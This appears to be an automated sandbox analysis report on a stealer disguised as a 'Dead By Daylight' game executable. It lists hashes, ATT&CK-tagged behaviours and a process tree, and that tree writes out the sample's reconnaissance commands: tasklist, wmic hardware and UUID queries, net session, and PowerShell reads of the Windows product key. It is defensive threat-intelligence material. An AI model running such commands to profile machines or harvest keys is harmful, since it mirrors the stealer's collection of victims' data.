8e07dd1c1d48abfa44bf0d6308fa48aadbe12e4f2706a8050360b84726267ed1

Resubmissions

13/07/2024, 23:29

240713-3g2bka1bjk 8

13/07/2024, 22:53

240713-2t4rsasgja 8

26/11/2023, 22:33

231126-2gk4xacg53 7

Analysis

max time kernel
1050s
max time network
999s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
13/07/2024, 22:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Dead By Daylight.exe
Size

70.8MB
MD5

cdb5615039c815dd9f46befa237d7423
SHA1

1ae2d5fbb5f9c88838ad739eec5c416968195520
SHA256

8e07dd1c1d48abfa44bf0d6308fa48aadbe12e4f2706a8050360b84726267ed1
SHA512

d928f2ef4586cab3d8f8bab2ce8b98d53f4275b72a0a82294cb02cb76d00958dc83c0da5082af3bc4ca246a1ea46e3b8256b100dd522b18f865c8c7101959e52
SSDEEP

1572864:Y4/4rzOchPZafBq9Ope9syyaSz3Ek+yvDuWjXMzbP0T1V1GU7:7kqcdZ+0o0AjzvDHXMzQT7

Score

8^/10

evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation	Dead By Daylight.exe

Executes dropped EXE 4 IoCs

pid	Process
1432	Dead By Daylight.exe
520	Dead By Daylight.exe
4244	Dead By Daylight.exe
5076	Dead By Daylight.exe

Loads dropped DLL 12 IoCs

pid	Process
600	Dead By Daylight.exe
600	Dead By Daylight.exe
600	Dead By Daylight.exe
1432	Dead By Daylight.exe
1432	Dead By Daylight.exe
1432	Dead By Daylight.exe
520	Dead By Daylight.exe
520	Dead By Daylight.exe
520	Dead By Daylight.exe
520	Dead By Daylight.exe
4244	Dead By Daylight.exe
5076	Dead By Daylight.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
35	raw.githubusercontent.com
36	raw.githubusercontent.com
17	raw.githubusercontent.com
18	raw.githubusercontent.com
19	raw.githubusercontent.com
20	raw.githubusercontent.com
21	raw.githubusercontent.com
38	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io
5	ipinfo.io
14	ipinfo.io
2	ipinfo.io

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
4896	powershell.exe
5712	powershell.exe
4196	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
5076	WMIC.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
756	WMIC.exe

Enumerates processes with tasklist 1 TTPs 52 IoCs

Process Discovery

T1057

pid	Process
6128	tasklist.exe
760	tasklist.exe
5568	tasklist.exe
5656	tasklist.exe
5632	tasklist.exe
5508	tasklist.exe
5424	tasklist.exe
5672	tasklist.exe
5412	tasklist.exe
5624	tasklist.exe
5556	tasklist.exe
6084	tasklist.exe
5440	tasklist.exe
6000	tasklist.exe
312	tasklist.exe
5488	tasklist.exe
5780	tasklist.exe
5916	tasklist.exe
5524	tasklist.exe
5396	tasklist.exe
5380	tasklist.exe
5680	tasklist.exe
5980	tasklist.exe
2264	tasklist.exe
5600	tasklist.exe
5448	tasklist.exe
5836	tasklist.exe
5904	tasklist.exe
5724	tasklist.exe
6036	tasklist.exe
5544	tasklist.exe
5876	tasklist.exe
5388	tasklist.exe
5664	tasklist.exe
5516	tasklist.exe
5432	tasklist.exe
5988	tasklist.exe
5592	tasklist.exe
5464	tasklist.exe
5472	tasklist.exe
5768	tasklist.exe
5456	tasklist.exe
5576	tasklist.exe
5404	tasklist.exe
5756	tasklist.exe
5708	tasklist.exe
5316	tasklist.exe
5500	tasklist.exe
5584	tasklist.exe
5536	tasklist.exe
5480	tasklist.exe
5716	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
1432	Dead By Daylight.exe
1432	Dead By Daylight.exe
1432	Dead By Daylight.exe
1432	Dead By Daylight.exe
4244	Dead By Daylight.exe
4244	Dead By Daylight.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
4204	powershell.exe
4204	powershell.exe
4204	powershell.exe
4196	powershell.exe
4196	powershell.exe
4196	powershell.exe
2124	powershell.exe
2124	powershell.exe
5712	powershell.exe
5712	powershell.exe
2124	powershell.exe
4896	powershell.exe
4896	powershell.exe
5712	powershell.exe
4196	powershell.exe
5936	powershell.exe
5936	powershell.exe
4896	powershell.exe
5712	powershell.exe
2124	powershell.exe
4896	powershell.exe
5936	powershell.exe
5680	powershell.exe
5680	powershell.exe
5680	powershell.exe
5936	powershell.exe
5680	powershell.exe
5360	powershell.exe
5360	powershell.exe
5360	powershell.exe
5076	Dead By Daylight.exe
5076	Dead By Daylight.exe
5076	Dead By Daylight.exe
5076	Dead By Daylight.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	600	Dead By Daylight.exe
Token: SeDebugPrivilege	312	tasklist.exe
Token: SeShutdownPrivilege	1432	Dead By Daylight.exe
Token: SeCreatePagefilePrivilege	1432	Dead By Daylight.exe
Token: SeShutdownPrivilege	1432	Dead By Daylight.exe
Token: SeCreatePagefilePrivilege	1432	Dead By Daylight.exe
Token: SeIncreaseQuotaPrivilege	3960	WMIC.exe
Token: SeSecurityPrivilege	3960	WMIC.exe
Token: SeTakeOwnershipPrivilege	3960	WMIC.exe
Token: SeLoadDriverPrivilege	3960	WMIC.exe
Token: SeSystemProfilePrivilege	3960	WMIC.exe
Token: SeSystemtimePrivilege	3960	WMIC.exe
Token: SeProfSingleProcessPrivilege	3960	WMIC.exe
Token: SeIncBasePriorityPrivilege	3960	WMIC.exe
Token: SeCreatePagefilePrivilege	3960	WMIC.exe
Token: SeBackupPrivilege	3960	WMIC.exe
Token: SeRestorePrivilege	3960	WMIC.exe
Token: SeShutdownPrivilege	3960	WMIC.exe
Token: SeDebugPrivilege	3960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3960	WMIC.exe
Token: SeRemoteShutdownPrivilege	3960	WMIC.exe
Token: SeUndockPrivilege	3960	WMIC.exe
Token: SeManageVolumePrivilege	3960	WMIC.exe
Token: 33	3960	WMIC.exe
Token: 34	3960	WMIC.exe
Token: 35	3960	WMIC.exe
Token: 36	3960	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3960	WMIC.exe
Token: SeSecurityPrivilege	3960	WMIC.exe
Token: SeTakeOwnershipPrivilege	3960	WMIC.exe
Token: SeLoadDriverPrivilege	3960	WMIC.exe
Token: SeSystemProfilePrivilege	3960	WMIC.exe
Token: SeSystemtimePrivilege	3960	WMIC.exe
Token: SeProfSingleProcessPrivilege	3960	WMIC.exe
Token: SeIncBasePriorityPrivilege	3960	WMIC.exe
Token: SeCreatePagefilePrivilege	3960	WMIC.exe
Token: SeBackupPrivilege	3960	WMIC.exe
Token: SeRestorePrivilege	3960	WMIC.exe
Token: SeShutdownPrivilege	3960	WMIC.exe
Token: SeDebugPrivilege	3960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3960	WMIC.exe
Token: SeRemoteShutdownPrivilege	3960	WMIC.exe
Token: SeUndockPrivilege	3960	WMIC.exe
Token: SeManageVolumePrivilege	3960	WMIC.exe
Token: 33	3960	WMIC.exe
Token: 34	3960	WMIC.exe
Token: 35	3960	WMIC.exe
Token: 36	3960	WMIC.exe
Token: SeDebugPrivilege	760	tasklist.exe
Token: SeShutdownPrivilege	1432	Dead By Daylight.exe
Token: SeCreatePagefilePrivilege	1432	Dead By Daylight.exe
Token: SeIncreaseQuotaPrivilege	5076	WMIC.exe
Token: SeSecurityPrivilege	5076	WMIC.exe
Token: SeTakeOwnershipPrivilege	5076	WMIC.exe
Token: SeLoadDriverPrivilege	5076	WMIC.exe
Token: SeSystemProfilePrivilege	5076	WMIC.exe
Token: SeSystemtimePrivilege	5076	WMIC.exe
Token: SeProfSingleProcessPrivilege	5076	WMIC.exe
Token: SeIncBasePriorityPrivilege	5076	WMIC.exe
Token: SeCreatePagefilePrivilege	5076	WMIC.exe
Token: SeBackupPrivilege	5076	WMIC.exe
Token: SeRestorePrivilege	5076	WMIC.exe
Token: SeShutdownPrivilege	5076	WMIC.exe
Token: SeDebugPrivilege	5076	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 600 wrote to memory of 1432	600	Dead By Daylight.exe	73
PID 600 wrote to memory of 1432	600	Dead By Daylight.exe	73
PID 1432 wrote to memory of 2056	1432	Dead By Daylight.exe	75
PID 1432 wrote to memory of 2056	1432	Dead By Daylight.exe	75
PID 2056 wrote to memory of 312	2056	cmd.exe	77
PID 2056 wrote to memory of 312	2056	cmd.exe	77
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 520	1432	Dead By Daylight.exe	79
PID 1432 wrote to memory of 4244	1432	Dead By Daylight.exe	80
PID 1432 wrote to memory of 4244	1432	Dead By Daylight.exe	80
PID 1432 wrote to memory of 1048	1432	Dead By Daylight.exe	81
PID 1432 wrote to memory of 1048	1432	Dead By Daylight.exe	81
PID 1048 wrote to memory of 3960	1048	cmd.exe	83
PID 1048 wrote to memory of 3960	1048	cmd.exe	83
PID 1432 wrote to memory of 4160	1432	Dead By Daylight.exe	84
PID 1432 wrote to memory of 4160	1432	Dead By Daylight.exe	84
PID 1432 wrote to memory of 508	1432	Dead By Daylight.exe	85
PID 1432 wrote to memory of 508	1432	Dead By Daylight.exe	85
PID 1432 wrote to memory of 4152	1432	Dead By Daylight.exe	86
PID 1432 wrote to memory of 4152	1432	Dead By Daylight.exe	86
PID 4160 wrote to memory of 760	4160	cmd.exe	91
PID 4160 wrote to memory of 760	4160	cmd.exe	91
PID 1700 wrote to memory of 4668	1700	net.exe	92
PID 1700 wrote to memory of 4668	1700	net.exe	92
PID 1432 wrote to memory of 4884	1432	Dead By Daylight.exe	93
PID 1432 wrote to memory of 4884	1432	Dead By Daylight.exe	93

C:\Users\Admin\AppData\Local\Temp\Dead By Daylight.exe
"C:\Users\Admin\AppData\Local\Temp\Dead By Daylight.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:600
- C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe
  "C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:312
- - C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe
    "C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1484 --field-trial-handle=1608,12146737355406384576,17684188506695382953,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe
    "C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1820 --field-trial-handle=1608,12146737355406384576,17684188506695382953,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=NaN get ExecutablePath
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:508
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1700
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"
    3⤵
    PID:4884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic logicaldisk get size
      4⤵
      Collects information from the system
      Suspicious use of AdjustPrivilegeToken
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"
    3⤵
    PID:208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4256
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"
    3⤵
    PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:2816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic OS get caption, osarchitecture
      4⤵
      PID:2996
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:2572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      PID:3436
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:2076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:756
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
    3⤵
    PID:2188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4264
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    PID:1144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=NaN get ExecutablePath
      4⤵
      PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2952
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3696
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:588
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4304
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1400
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4540
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3456
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2520
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2632
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1740
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4584
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4884
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:784
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2708
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4600
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2124
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3604
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:32
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4672
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:876
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:820
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2816
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2040
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3384
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4392
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:292
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3876
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:792
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4820
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1500
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:424
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1712
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:196
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2100
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2544
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4868
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6128
